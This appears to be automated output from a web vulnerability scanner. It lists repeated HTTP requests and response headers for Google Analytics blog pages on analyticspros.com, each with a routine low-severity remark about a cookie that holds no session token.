GET /blog/googleanalytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:48 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:36:50 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:36:50 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29262
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:04:59 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:05:01 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:05:01 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29205
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 01:13:59 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:13:59 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 01:14:00 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 01:09:08 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:09:09 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 01:09:09 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34465
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:27 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:36:34 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:36:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33583
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/106-google-analytics-health-check.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 01:41:45 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:41:46 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 01:41:46 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26246
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/108-custom-variable-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 00:56:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 00:56:14 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 00:56:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22825
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/109-google-analytics-training-san-jose-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:36:28 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:36:28 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/113-domain-hostname-content-reports.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:27 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:36:29 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:36:29 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 39300
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:36:27 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:36:27 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21340
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 00:42:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 00:42:57 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 00:42:57 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22217
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 00:42:48 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 00:42:49 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 00:42:49 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29500
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/122-traning-workshop-washington-dc-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 00:42:48 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 00:42:49 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 00:42:49 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26177
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 01:30:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:30:41 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 01:30:41 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/62-tracking-actual-adwords-keywords.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:36:53 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:36:53 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24090
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
